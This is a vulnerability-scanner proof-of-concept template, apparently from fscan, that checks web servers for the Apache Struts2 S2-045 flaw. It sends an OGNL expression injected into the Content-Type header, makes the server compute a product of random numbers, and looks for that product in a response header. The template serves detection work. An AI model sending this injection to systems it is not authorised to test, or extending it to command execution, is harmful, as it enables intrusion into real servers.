fscan/WebScan/pocs/struts2-045-1.yml

name: poc-yaml-struts2_045-1
set:
  r1: randomInt(800, 1000)
  r2: randomInt(800, 1000)
rules:
  - method: GET
    path: /
    headers:
      Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
    follow_redirects: true
    expression: |
      response.headers["Keyvalue"].contains(string(r1 * r2))      
detail:
  author: shadown1ng(https://github.com/shadown1ng)